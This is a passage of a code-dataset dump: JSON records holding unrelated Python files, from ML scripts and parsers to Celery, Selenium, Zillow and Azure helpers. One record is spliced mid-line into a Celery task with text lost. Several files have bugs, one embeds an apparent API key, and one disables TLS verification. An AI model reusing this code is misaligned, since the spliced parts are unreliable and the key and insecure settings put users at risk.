fw.write(content)\n\n fr.close()\n fw.close()\n\ndef main():\n #0.获取用户copy的文件夹的名字\n oldFileName=input(\"请输入copy的文件夹名字\")\n #1.创建一个文件夹\n newFileName=oldFileName+\"-副本\"\n # os.mkdir(\"%s-副本\"%oldFileName)\n os.mkdir(newFileName)\n #2.获取old文件夹中所有的文件名字\n fileName=os.listdir(oldFileName)\n #3.使用多进程的方式copy原文件夹中所有的文件到新的文件夹下\n pool=Pool(5)\n\n for name in fileName:\n pool.apply_async(copyFileTask,args=(name,oldFileName,newFileName))#后面一定要写上“,”表示远祖否则无法传到进程里面\n \n pool.close()\n pool.join()\n\n\nif __name__==\"__main__\":\n main()","sub_path":"01-learn/进阶/04-进程线程/01-进程/test/09-多进程拷贝文件.py","file_name":"09-多进程拷贝文件.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"525085471","text":"#! /usr/bin/env python\n#coding=utf-8\n\nfrom config import *\nimport pymongo\n\ndb=pymongo.Connection(conf.get('proxy', 'db')).proxy\ndef getHttpProxy(id):\n\tif id<0: return conf.get('proxy', 'proxy'+str(id))\n\telse: \n\t\titem=db.http.find_one(id)\n\t\treturn None if item is None else item['proxy']\n\ndef getHttpsProxy(id):\n\tif id<0: return conf.get('proxy', 'proxy'+str(id))\n\telse: \n\t\titem=db.https.find_one(id)\n\t\treturn None if item is None else item['proxy']\n\nif __name__=='__main__':\n\tprint(getHttpProxy(1))\n","sub_path":"proxydao.py","file_name":"proxydao.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"157570730","text":"\n\ndef train(X_train,Y_train):\n\tsize=X_train.shape[0]\n\tcount1=0\n\tcount0=0\n\tcol=X_train.shape[1]\n\tp1=[-1 for i in range(col)]\n\tp2=[-1 for i in range(col)]\n\tp3=[-1 for i in range(col)]\n\tp4=[-1 for i in range(col)]\n\tfor i in range(size):\n\t\tif Y_train.iloc[i]==1:\n\t\t\tcount1+=1\n\t\telse:\n\t\t\tcount0+=1\n\tmp0=count0/size\n\tmp1=count1/size\n\tfor j in range(col):\n\t\tv0y0=0\n\t\tv0y1=0\n\t\tv1y0=0\n\t\tv1y1=0\n\t\tfor k in range(size):\n\t\t\tif Y_train.iloc[k]==0 and X_train.iloc[k][j]==0:\n\t\t\t\tv0y0+=1\n\t\t\tif Y_train.iloc[k]==1 and X_train.iloc[k][j]==0:\n\t\t\t\tv0y1+=1\n\t\t\tif Y_train.iloc[k]==0 and X_train.iloc[k][j]==1:\n\t\t\t\tv1y0+=1\n\t\t\tif Y_train.iloc[k]==1 and X_train.iloc[k][j]==1:\n\t\t\t\tv1y1+=1\n\t\tp1[j]=v0y0/count0\n\t\tp2[j]=v0y1/count1\n\t\tp3[j]=v1y0/count0\n\t\tp4[j]=v1y1/count1\n\n\t\n\treturn mp0,mp1,p1,p2,p3,p4\n\ndef testing(X_test,Y_test,mp0,mp1,p1,p2,p3,p4):\n\ttruep=0\n\tfalsep=0\n\tfalsen=0\n\n\tcount=0\n\n\tsize=X_test.shape[0]\n\tfor i in range(X_test.shape[0]):\n\t\tcr=X_test.iloc[i]\n\t\ty=Y_test.iloc[i]\n\t\tprod1=1\n\t\tprod2=1\n\t\tfor j in range(len(cr)):\n\t\t\tif cr[j]==0:\n\t\t\t\tprod1=prod1*p1[j]\n\t\t\t\tprod2=prod2*p2[j]\n\t\t\t\t\n\t\t\telse:\n\t\t\t\tprod1=prod1*p3[j]\n\t\t\t\tprod2=prod2*p4[j]\n\t\t\t\t\n\n\t\tprediction=1\n\t\n\t\tif(prod1>prod2):\n\t\t\tprediction=0\n\n\t\tif(prediction==Y_test.iloc[i]):\n\t\t\tcount+=1\n\t\n\treturn (count/size)\n\n\n\n\n\n\n\n\n","sub_path":"Lab3/p1.py","file_name":"p1.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"513507039","text":"\nimport numpy as np\ndef grdescent(func,w0,stepsize,maxiter,tolerance=1e-02):\n# INPUT:\n# func function to minimize\n# w_trained = initial weight vector\n# stepsize = initial gradient descent stepsize\n# tolerance = if norm(gradient)0:\n\t\tfor task in tasks:\n\t\t\tmember_id = task.member_id\n\t\t\tmember = Member.objects.get(id=member_id)\n\t\t\tqer = Queryer.objects.get(constom=member)\n\t\t\tif not qer.is_busy:\n\t\t\t\ttry:\n\t\t\t\t\tsrcfile_id = task.srcfile_id\n\t\t\t\t\tsrcfile = SourceFile.objects.get(id=srcfile_id)\n\t\t\t\t\tselect = task.select\n\t\t\t\t\tip = task.ip\n\t\t\t\t\tusername = task.username\n\t\t\t\t\tif task.modal:\n\t\t\t\t\t\tmodal = json.loads(task.modal)\n\t\t\t\t\telse:\n\t\t\t\t\t\tmodal = ''\n\t\t\t\t\tif select in ['sjpl3', 'tyhx3', 'xdhx3', 'TelCheck', 'IdPhoto', 'TelStatus', 'TelPeriod']:\n\t\t\t\t\t\tif select in ['TelCheck', 'IdPhoto', 'TelStatus', 'TelPeriod']:\n\t\t\t\t\t\t\tmodal = select\n\t\t\t\t\t\tresult = for_hx.delay(srcfile, member, select, ip, username, modal)\n\t\t\t\t\telse:\n\t\t\t\t\t\tresult = for_ice.delay(srcfile, member, select, ip, username, modal)\n\t\t\t\t\tqer.is_busy = True\n\t\t\t\t\tqer.do_on_file = os.path.basename(str(srcfile))\n\t\t\t\t\tqer.end_match = timezone.now()\n\t\t\t\t\tqer.save()\n\t\t\t\t\tmember.taskid = result.id\n\t\t\t\t\tmember.save()\n\t\t\t\texcept Exception:\n\t\t\t\t\tqer.is_busy = False\n\t\t\t\t\tqer.end_match = timezone.now()\n\t\t\t\t\tqer.save()\n\t\t\t\t\ttask.delete()\n\t\t\t\t\terrlog.error('扫描任务失败:'+traceback.format_exc())\n\t\t\t\t\treturn 'error!'\n\t\t\t\ttask.delete()\n\t\t\t\treturn 'add task to celery'\n\treturn \"no task\"\n\n\n\t\n\n\n","sub_path":"tags/DTS/Mapping_celery/Mapping/analyse/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"532189032","text":"import logging\nimport requests\nfrom src import WebDriverWait, EC, By\nimport time\n\nclass Operations(object):\n \n def __init__ (self, driver):\n self.driver = driver\n \n def check_url(self, url):\n \"\"\"\n This function is used to check if the given link is broken or not.It simply makes a http call and checks response\n :param url: link which you want to check\n :return: True if response is 200 else False\n \"\"\"\n try:\n request = requests.get(url, verify=False)\n if request.status_code == 200:\n return True\n else:\n return False\n except Exception as e:\n print(e)\n return False\n \n def get_element(self, element_data):\n try:\n return WebDriverWait(self.driver, 3000).until(\n EC.presence_of_element_located((By.XPATH, element_data)))\n except Exception:\n logging.error(\"Element not found\")\n\n def full_page_screenshot(self, image_name=None):\n try:\n if not image_name:\n image_name = int(round(time.time() * 1000))\n self.driver.get_screenshot_as_file(\"./tmp/{}.png\".format(image_name))\n except Exception as e:\n logging.exception(e)\n ","sub_path":"src/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"513527442","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport sys, os\nsys.path.append(os.path.join(os.path.dirname(__file__), '../../utils'))\n\nimport h5py, random\nimport numpy as np\nfrom tqdm import tqdm\nfrom base_loader import Base_Loader\nfrom cloud_util import *\nimport time\n\nclass PCD_Loader(Base_Loader):\n def __init__(self, dir_name, dataset_model, dataset_size):\n super(PCD_Loader, self).__init__(dir_name, dataset_model, dataset_size)\n\n def load_hdf5(self):\n path = self.find_h5py_filenames(self.dir)[0]\n dir_path = self.dir+\"/\"+path\n self.hdf5_file = h5py.File(dir_path, \"r\")\n\n print(\"Start loading datasets !!\")\n for n in tqdm(range(0, self.dataset_size)):\n pcl_data = self.hdf5_file[\"data_\" + str(n + 1)]['pcl'][()]\n pose_data = self.hdf5_file[\"data_\" + str(n + 1)]['pose'][()]\n pose_data = self.conv_quat2mat(pose_data)\n self.x_data.append(pcl_data)\n self.y_data.append(pose_data)\n\n def get_pcd_data(self, index):\n pcd_data = self.x_data[index]\n x_data, pcd_offset = getNormalizedPcd(pcd_data, 1024)\n y_data = self.y_data[index]\n y_pos = y_data[0:3] - pcd_offset\n y_rot = y_data[3:]\n y_data = np.concatenate([y_pos, y_rot])\n\n return x_data, y_data\n\n\n def get_voxel_data(self, index, resolution):\n channel = 1\n pcd_data = self.x_data[index]\n pose_data = self.y_data[index]\n min_p, max_p, diff_max = doMinMax(pcd_data)\n voxel = np.zeros((resolution, resolution, resolution), dtype=\"float32\")\n binary_data = runMakeVoxelBinary(pcd_data, resolution)\n voxel = binary_data.reshape(resolution, resolution, resolution)\n voxel = voxel[np.newaxis, :]\n\n norm_pose_data = np.zeros((12), dtype=\"float32\")\n norm_pose_data[0] = (pose_data[0] - min_p[0]) / diff_max\n norm_pose_data[1] = (pose_data[1] - min_p[1]) / diff_max\n norm_pose_data[2] = (pose_data[2] - min_p[2]) / diff_max\n norm_pose_data[3] = pose_data[3]\n norm_pose_data[4] = pose_data[4]\n norm_pose_data[5] = pose_data[5]\n norm_pose_data[6] = pose_data[6]\n norm_pose_data[7] = pose_data[7]\n norm_pose_data[8] = pose_data[8]\n norm_pose_data[9] = pose_data[9]\n norm_pose_data[10] = pose_data[10]\n norm_pose_data[11] = pose_data[11]\n\n return voxel, norm_pose_data\n\n def get_voxel(self, index):\n voxel_data = self.x_data[index]\n pose_data = self.y_data[index]\n print(pose_data)\n return voxel_data, pose_data\n\n\nif __name__ == \"__main__\":\n loader = PCD_Loader(\"../../datasets/\", \"HV7\", 200)\n loader.load_hdf5()\n\n size = loader.dataset_size\n op_time = 0.0\n for i in range(size):\n print(i)\n s_time = time.time()\n voxel, pose = loader.get_voxel_data(i, 50)\n e_time = time.time()\n lap_time = e_time - s_time\n op_time += lap_time\n \n\n\n","sub_path":"data/pcd_loader.py","file_name":"pcd_loader.py","file_ext":"py","file_size_in_byte":2979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"204995760","text":"# encoding: UTF-8\n\n# 默认空值\nEMPTY_STRING = ''\nEMPTY_UNICODE = u''\nEMPTY_INT = 0\nEMPTY_FLOAT = 0.0\n\nSAVE_DATA = u'保存数据'\n\nSTOCK_SYMBOL = u'代码'\nSTOCK_NAME = u'名称'\nLAST_PRICE = u'最新价'\nPRE_CLOSE_PRICE = u'昨收盘'\nVOLUME = u'成交量'\nOPEN_PRICE = u'开盘价'\nHIGH_PRICE = u'最高价'\nLOW_PRICE = u'最低价'\nCHANGEPER_PRICE = u'涨幅'\nTIME = u'时间'\nMSG = u'信息'\nREMOVE_CODE =u'删除代码'\n\nGATEWAY = u'接口'\nCONTENT = u'内容'\n\nERROR_CODE = u'错误代码'\nERROR_MESSAGE = u'错误信息'\n\n\n\nACCOUNT_ID = u'账户编号'\nPRE_BALANCE = u'昨净值'\nBALANCE = u'净值'\nAVAILABLE = u'可用'\nCOMMISSION = u'手续费'\nMARGIN = u'保证金'\nCLOSE_PROFIT = u'平仓盈亏'\n\nTRADING = u'交易'\nPRICE_TYPE = u'价格类型'\nEXCHANGE = u'交易所'\nCURRENCY = u'货币'\nPRODUCT_CLASS = u'产品类型'\nLAST = u'最新'\nSEND_ORDER = u'发单'\nCANCEL_ALL = u'全撤'\nVT_SYMBOL = u'vt系统代码'\nCONTRACT_SIZE = u'合约大小'\nPRICE_TICK = u'最小价格变动'\nSTRIKE_PRICE = u'行权价'\nUNDERLYING_SYMBOL = u'标的代码'\nOPTION_TYPE = u'期权类型'\n\nREFRESH = u'刷新'\nSEARCH = u'查询'\nCONTRACT_SEARCH = u'合约查询'\n\nMARKET_DATA = u'行情'\nLOG = u'日志'\nERROR = u'错误'\nTRADE = u'成交'\nORDER = u'委托'\nPOSITION = u'持仓'\nACCOUNT = u'账户'\n\nSYSTEM = u'系统'\nCONNECT_DATABASE = u'连接数据库'\nEXIT = u'退出'\nAPPLICATION = u'功能'\nDATA_RECORDER = u'行情记录'\nRISK_MANAGER = u'风控管理'\n\nSTRATEGY = u'策略'\nCTA_STRATEGY = u'CTA策略'\n\nHELP = u'帮助'\nRESTORE = u'还原窗口'\nABOUT = u'关于'\nTEST = u'测试'\nCONNECT = u'连接'\nEDIT_SETTING = u'编辑配置'\nLOAD = u'读取'\nSAVE = u'保存'\n\nCPU_MEMORY_INFO = u'CPU使用率:{cpu}% 内存使用率:{memory}%'\nCONFIRM_EXIT = u'确认退出?'\n\nGATEWAY_NOT_EXIST = u'接口不存在:{gateway}'\nDATABASE_CONNECTING_COMPLETED = u'MongoDB连接成功'\nDATABASE_CONNECTING_FAILED = u'MongoDB连接失败'\nDATA_INSERT_FAILED = u'数据插入失败,MongoDB没有连接'\nDATA_QUERY_FAILED = u'数据查询失败,MongoDB没有连接'\nDATA_UPDATE_FAILED = u'数据更新失败,MongoDB没有连接'\n","sub_path":"ccText.py","file_name":"ccText.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"123873469","text":"'''\r\nCreated on 26 mar. 2020\r\n\r\n@author: George\r\n'''\r\nimport math\r\n\r\ndef dist(i,j): # i si j sunt puncte de forma (x,y)\r\n xi = i[0]\r\n yi = i[1]\r\n \r\n xj = j[0]\r\n yj = j[1]\r\n \r\n dx = (xi - xj)**2\r\n dy = (yi - yj)**2 # a nu se inelege ca ar fi derivate\r\n dist = math.sqrt( dx + dy )\r\n return dist\r\n# !!! DIST MUST BE THE SAME FUNCTION USED IN THE MAIN MODULE.\r\n# ELSE IT MAKES NO SENSE TO CREATE THE ADJACENCE MATRIX AND CALCULATE THE DISTANCE WITH DIFFERENT METHODS !!!\r\n\r\ndef parse(fileName): # safer method to parse file input to dict of label : (x,y) tuples\r\n nodes = {}\r\n \r\n f = open(fileName, \"r\")\r\n while True:\r\n \r\n line = f.readline()\r\n parts = line.split(\" \")\r\n \r\n if len(parts) == 3:\r\n label = int(parts[0]) - 1\r\n x = float(parts[1])\r\n y = float(parts[2])\r\n nodes[label] = (x,y)\r\n else:\r\n break\r\n return nodes\r\n\r\n\r\n\r\ndef parseBerlin(fileName, dist_callback):\r\n f = open(fileName, \"r\")\r\n \r\n points = []\r\n \r\n while True:\r\n \r\n line = f.readline()\r\n parts = line.split(\" \")\r\n \r\n if len(parts) == 3:\r\n label = int(parts[0]) - 1\r\n x = float(parts[1])\r\n y = float(parts[2])\r\n point = (label,x,y)\r\n points.append(point)\r\n else:\r\n break\r\n \r\n #N = len(points) # 52\r\n \r\n \r\n A = []\r\n for pointi in points:\r\n row = []\r\n for pointj in points:\r\n ij = dist_callback(pointi,pointj) # distance function is used here\r\n row.append(ij)\r\n A.append(row)\r\n \r\n return A # adjacence matrix\r\n","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"286938971","text":"class Solution(object):\n def minimumTotal(self, triangle):\n \"\"\"\n :type triangle: List[List[int]]\n :rtype: int\n \"\"\"\n if not triangle:\n return 0\n m = len(triangle) + 1\n n = len(triangle[-1]) + 1\n A = [[float('inf') for _ in range(n)] for _ in range(m)]\n A[0][0] = 0\n for i in range(1, m):\n for j in range(1, len(triango[i-1])+1):\n A[i][j] = min(A[i-1][j], A[i-1][j-1]) + triangle[i-1][j-1]\n\n return min(A[-1])\n\ntriango = [\n [2],\n [3,4],\n [6,5,7],\n [4,1,8,3]\n]\n\nS = Solution()\nprint(S.minimumTotal(triango))","sub_path":"120 - Triangle.py","file_name":"120 - Triangle.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"551716352","text":"import urllib2\nimport xml \nimport os\nimport xml.etree.ElementTree as etree\n\nzips = file('zipcodes.txt', 'r')\nurl = 'http://www.zillow.com/webservice/GetDemographics.htm?zws-id=X1-ZWz1b260i9k4jv_7j3qs&zip='\noutputName = 'output.txt'\n# os.remove(output.txt)\noutput = open(outputName, 'w')\noutput.write('')\n\nfor line in zips:\n\tfile = urllib2.urlopen(url + line)\n\ttree = etree.parse(file)\n\tnotags = etree.tostring(tree, encoding='utf8', method='text')\n\tprint(notags)\n\t# for line in file:\n\t# \t#data = file.readline()\n\t# \tprint line\n\t# \toutput.write(line)\n\toutput.write(notags)\n\toutput.write(\"\\n\")\nfile.close()\noutput.close()\nneighborhoods.close()\n","sub_path":"Homework/11-06-2014/zillowDemographics.py","file_name":"zillowDemographics.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"509882623","text":"# -*- coding: UTF-8 -*-\n# Created by thpffcj on 2019-03-28.\n\nfrom __future__ import print_function\n\nimport os\nimport time\nfrom datetime import timedelta\n\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn import metrics\n\nfrom preprocess128 import preprocess\nfrom cnews_loader_withoutSeqLens import batch_iter\nfrom evaluatewithws import evaluatews\n\nfrom selfattention_lstm_3 import TRNNConfig,TextRNN\n\nsource_path = '../source/zj2ss'\ntrainpath = source_path + '/train-ws.txt'\nvalidatepath = source_path + '/validate-ws.txt'\n#####\ntest_path = '../source/zj2ss'\ntestpath_name = test_path + '/test-name.txt'\ntestpath = test_path + '/test-noname.txt'\nmodelpath = '../source/zj2ss/2014model_size128.model'\n\nmodel_save = '../result/model_files/zj2ss'\nsave_dir = model_save + '/HNS_checkpoints/128-465-ws-50-70'\nsave_path = os.path.join(save_dir, 'best_validation_selfattention_lstm_3') # 最佳验证结果保存路径\ntensorboard_dir = model_save + '/HNS_tensorboard/128-465-ws-50-70'\n\np = preprocess(modelpath)\np.load_models()\np.setinputdatapath(trainpath)\np.settestdatapath(testpath)\np.setvalidatedatapath(validatepath)\n\n\ndef get_time_dif(start_time):\n \"\"\"获取已使用时间\"\"\"\n end_time = time.time()\n time_dif = end_time - start_time\n return timedelta(seconds=int(round(time_dif)))\n\n\ndef feed_data(x1_batch, x2_batch, y_batch, keep_prob):\n feed_dict = {\n model.input_x_1: x1_batch,\n model.input_x_2: x2_batch,\n model.input_y: y_batch,\n model.keep_prob: keep_prob,\n }\n return feed_dict\n\n\ndef evaluate(sess, x1_, x2_, y_):\n \"\"\"评估在某一数据上的准确率和损失\"\"\"\n data_len = len(x1_)\n batch_eval = batch_iter(x1_, x2_, y_, 128)\n total_loss = 0.0\n total_acc = 0.0\n for x1_batch, x2_batch, y_batch in batch_eval:\n batch_len = len(x1_batch)\n feed_dict = feed_data(x1_batch, x2_batch, y_batch, 1.0)\n loss, acc = sess.run([model.loss, model.acc], feed_dict=feed_dict)\n total_loss += loss * batch_len\n total_acc += acc * batch_len\n\n return total_loss / data_len, total_acc / data_len\n\n\ndef test():\n print(\"Loading test data...\")\n start_time = time.time()\n x1_test, x2_test, y_test = p.setinputdata(model.config.seq_length_1,\n model.config.seq_length_2, flag=2)\n\n session = tf.Session()\n session.run(tf.global_variables_initializer())\n saver = tf.train.Saver()\n saver.restore(sess=session, save_path=save_path) # 读取保存的模型\n\n print('Testing...')\n loss_test, acc_test = evaluate(session, x1_test, x2_test, y_test)\n msg = 'Test Loss: {0:>6.2}, Test Acc: {1:>7.2%}'\n print(msg.format(loss_test, acc_test))\n\n batch_size = 128\n data_len = len(x1_test)\n num_batch = int((data_len - 1) / batch_size) + 1\n\n y_test_cls = np.argmax(y_test, 1)\n y_pred_cls = np.zeros(shape=len(x1_test), dtype=np.int32) # 保存预测结果\n for i in range(num_batch): # 逐批次处理\n start_id = i * batch_size\n end_id = min((i + 1) * batch_size, data_len)\n feed_dict = {\n model.input_x_1: x1_test[start_id:end_id],\n model.input_x_2: x2_test[start_id:end_id],\n model.keep_prob: 1.0 # 这个表示测试时不使用dropout对神经元过滤\n }\n # 将所有批次的预测结果都存放在y_pred_cls中\n y_pred_cls[start_id:end_id] = session.run(model.y_pred_cls, feed_dict=feed_dict)\n\n print(\"Precision, Recall and F1-Score...\")\n print(metrics.classification_report(y_test_cls, y_pred_cls, digits=3)) # 直接计算准确率,召回率和f值\n\n # 混淆矩阵\n print(\"Confusion Matrix...\")\n cm = metrics.confusion_matrix(y_test_cls, y_pred_cls)\n print(cm)\n\n time_dif = get_time_dif(start_time)\n print(\"Time usage:\", time_dif)\n return y_test_cls, y_pred_cls\n\n\nconfig = TRNNConfig()\nmodel = TextRNN(config)\n\ny_test_cls, y_pred_cls = test()\nevaluatews(y_pre_cls=y_pred_cls, y_test_cls=y_test_cls, testdatapath=testpath_name)","sub_path":"analysis-of-legal-documents/project/test/run_zj_test_selfattention_lstm_3.py","file_name":"run_zj_test_selfattention_lstm_3.py","file_ext":"py","file_size_in_byte":4027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"42016144","text":"\"\"\"\nGiven an array chocolate of n non-negative integers, where the values are sweetness levels of the chocolate.\nYou are also given a value k which denotes the number of friends you will share this chocolate with.\nYour friends are greedy so they will always take the highest sweetness chunk.\nFind out what is the maximum sweetness level you could get.\n\ntldr: Split the array into k non-empty continuous subarrays.\nWrite an algorithm to maximize the minimum sum among these k subarrays.\n\nExample:\n\nInput: chocolate = [6, 3, 2, 8, 7, 5], k = 3\nOutput: 9\nExplanation:\nThe values in array are sweetness level in each chunk of chocolate. Since k = 3, so you have to divide this array in 3 pieces,\nsuch that you would get maximum out of the minimum sweetness level. So, you should divide this array in\n[6, 3] -> 6 + 3 = 9\n[2, 8] -> 2 + 8 = 10\n[7, 5] -> 7 + 5 = 12\nYour other two friends will take the sweetest chunk, so they will take 12 and 10.\nThe maximum sweetness level you could get is 9.\n\nuse the binary search method:\nsearch for the maximum viable sweetness level\nstart from min(chocolate) to sum(chocolate)\ncheck if we can split it by k parts\nkeep going until we can't\nn*log(sum(choc) - min(choc))\n\nFollow-up: can we optimize the split function from O(N)? Yes - cumulative sum and binary search makes it O(k*logN)\n\"\"\"\n\n\ndef can_split_into_n(chocs, target, k):\n count = 0\n running = 0\n for c in chocs:\n running += c\n if running >= target:\n running = 0\n count += 1\n return count >= k\n\n\ndef bsearch_right(start, end, arr, target):\n best = None\n while start <= end:\n mid = start + (end - start) // 2\n if arr[mid] == target:\n return mid\n elif arr[mid] > target:\n best = mid\n end = mid - 1\n else:\n start = mid + 1\n return best\n\n\ndef can_split_into_n_bsearch(cum_choc, target, k):\n start = 0\n i = 0\n for _ in range(k):\n start += target\n idx = bsearch_right(i, len(cum_choc) - 1, cum_choc, start)\n if not idx:\n return False\n i = idx + 1\n start = cum_choc[idx]\n return True\n\n\ndef cum_sum(arr):\n res = []\n curr = 0\n for a in arr:\n curr += a\n res.append(curr)\n return res\n\n\ndef fastn_bsearch_choc_sweetness(chocs, k):\n start = min(chocs)\n end = sum(chocs)\n best = min(chocs)\n cum_chocs = cum_sum(chocs)\n while start <= end:\n mid = start + (end - start) // 2\n if can_split_into_n_bsearch(cum_chocs, mid, k):\n best = mid\n start = mid + 1\n else:\n end = mid - 1\n return best\n\n\ndef bsearch_choc_sweetness(chocs, k):\n start = min(chocs)\n end = sum(chocs)\n best = min(chocs)\n while start <= end:\n mid = start + (end - start) // 2\n if can_split_into_n(chocs, mid, k):\n best = mid\n start = mid + 1\n else:\n end = mid - 1\n return best\n\n\nif __name__ == \"__main__\":\n\n chocolate = [6, 3, 2, 8, 7, 5]\n k = 3\n exp = 9\n assert bsearch_choc_sweetness(chocolate, k) == exp\n assert fastn_bsearch_choc_sweetness(chocolate, k) == exp\n","sub_path":"lc_discuss/old/batch_3/faster_choc_sweetness.py","file_name":"faster_choc_sweetness.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"264972656","text":"ans = 0\n\nwhile True:\n try:\n line = input()\n except EOFError:\n break\n\n lhs, rhs = line.split('=')\n\n lhs_eval = eval(lhs)\n if '?' in rhs: continue\n rhs_eval = eval(rhs)\n if lhs_eval == rhs_eval: ans += 1\n\nprint(ans)","sub_path":"UVa Online Judge/11878.py","file_name":"11878.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"110378408","text":"# author Qiyi Shan\n# Date 3.16.2017\n\nfrom Homework.exprtree import Var, Cond, Oper, Value, Nega, Func\nfrom Homework.newsplit import new_split_iter, NegativeSign\n\n__priority_list = ['=', 'and', 'or', '?', '< > <= >= == !=', '+ -', '* / %', NegativeSign, '**']\n__to_right_direction = {'=': False, 'and': True, 'or': True, '?': False, '< > <= >= == !=': True, '+ -': True,\n\t\t\t\t\t\t'* / %': True, NegativeSign: True, '**': False}\n\n\ndef tree_assign(iterator):\n\treturn to_expr_tree(iterator)\n\n\ndef to_expr_tree(expr):\n\tif type(expr) == str:\n\t\texpr = new_split_iter(expr)\n\texpr = list(expr)[0:-1]\n\treturn __to_tree(expr)\n\n\ndef __split_args(expr, pos):\n\texprs = [[]]\n\twhile pos < len(expr):\n\t\tif expr[pos] == ',':\n\t\t\texprs.append([])\n\t\telse:\n\t\t\texprs[-1].append(expr[pos])\n\t\tpos += 1\n\treturn [__to_tree(e) for e in exprs]\n\n\ndef __to_tree(expr):\n\t\"\"\"Recursively convert expression to tree\"\"\"\n\tif len(expr) == 1:\n\t\tif expr[0].isnumeric():\n\t\t\treturn Value(expr[0])\n\t\telse:\n\t\t\treturn Var(expr[0])\n\n\tfor operator in __priority_list:\n\t\tindex_order = range(len(expr) - 1, -1, -1) if __to_right_direction[operator] else range(len(expr))\n\t\tfor i in index_order:\n\t\t\tif expr[i] in operator.split(' ') and not __in_brackets(expr, i):\n\t\t\t\tif expr[i] == '?':\n\t\t\t\t\tcolon_pos = i + expr[i:].index(':')\n\t\t\t\t\treturn Cond(__to_tree(expr[:i]), __to_tree(expr[i + 1:colon_pos]), __to_tree(expr[colon_pos + 1:]))\n\t\t\t\telif expr[i] is NegativeSign:\n\t\t\t\t\treturn Nega(__to_tree(expr[i + 1:]))\n\t\t\t\telse:\n\t\t\t\t\treturn Oper(__to_tree(expr[:i]), expr[i], __to_tree(expr[i + 1:]))\n\n\tfor pos, val in enumerate(expr[:-1]):\n\t\tif val not in __priority_list and not val.isnumeric() and expr[pos + 1] == '(' and not __in_brackets(expr, pos):\n\t\t\treturn Func(val, __split_args(expr[pos + 2:pos + expr[pos:].index(')')], pos))\n\tif expr[0] == '(':\n\t\treturn __to_tree(expr[1:-1])\n\n\traise NotImplementedError(str(expr) + \" not implemented\")\n\n\ndef __in_brackets(expr, pos):\n\t\"\"\"Test if an operator is included in brackets\"\"\"\n\treturn expr[:pos].count('(') > expr[:pos].count(')')\n\n\nif __name__ == \"__main__\":\n\tprint(to_expr_tree('func(4,5)'))\n\tprint(to_expr_tree('func(1*5) + 6'))\n","sub_path":"infixtotree.py","file_name":"infixtotree.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"387122678","text":"# -*- coding: utf-8 -*-\n'''\nAzure Resource Manager (ARM) Network Public IP Address Execution Module\n\n.. versionadded:: 1.0.0\n\n:maintainer: \n:maturity: new\n:depends:\n * `azure `_ >= 4.0.0\n * `azure-common `_ >= 1.1.23\n * `azure-mgmt `_ >= 4.0.0\n * `azure-mgmt-compute `_ >= 4.6.2\n * `azure-mgmt-network `_ >= 4.0.0\n * `azure-mgmt-resource `_ >= 2.2.0\n * `azure-mgmt-storage `_ >= 2.0.0\n * `azure-mgmt-web `_ >= 0.35.0\n * `azure-storage `_ >= 0.36.0\n * `msrestazure `_ >= 0.6.1\n:platform: linux\n\n:configuration: This module requires Azure Resource Manager credentials to be passed as keyword arguments\n to every function in order to work properly.\n\n Required provider parameters:\n\n if using username and password:\n * ``subscription_id``\n * ``username``\n * ``password``\n\n if using a service principal:\n * ``subscription_id``\n * ``tenant``\n * ``client_id``\n * ``secret``\n\n Optional provider parameters:\n\n**cloud_environment**: Used to point the cloud driver to different API endpoints, such as Azure GovCloud.\n Possible values:\n * ``AZURE_PUBLIC_CLOUD`` (default)\n * ``AZURE_CHINA_CLOUD``\n * ``AZURE_US_GOV_CLOUD``\n * ``AZURE_GERMAN_CLOUD``\n\n'''\n\n# Python libs\nfrom __future__ import absolute_import\nimport logging\n\ntry:\n from six.moves import range as six_range\nexcept ImportError:\n six_range = range\n\n# Azure libs\nHAS_LIBS = False\ntry:\n import azure.mgmt.network.models # pylint: disable=unused-import\n from msrestazure.tools import is_valid_resource_id, parse_resource_id\n from msrest.exceptions import SerializationError\n from msrestazure.azure_exceptions import CloudError\n HAS_LIBS = True\nexcept ImportError:\n pass\n\nlog = logging.getLogger(__name__)\n\n\nasync def delete(hub, name, resource_group, **kwargs):\n '''\n .. versionadded:: 1.0.0\n\n Delete a public IP address.\n\n :param name: The name of the public IP address to delete.\n\n :param resource_group: The resource group name assigned to the\n public IP address.\n\n CLI Example:\n\n .. code-block:: bash\n\n azurerm.network.public_ip_address.delete test-pub-ip testgroup\n\n '''\n result = False\n netconn = await hub.exec.utils.azurerm.get_client('network', **kwargs)\n try:\n pub_ip = netconn.public_ip_addresses.delete(\n public_ip_address_name=name,\n 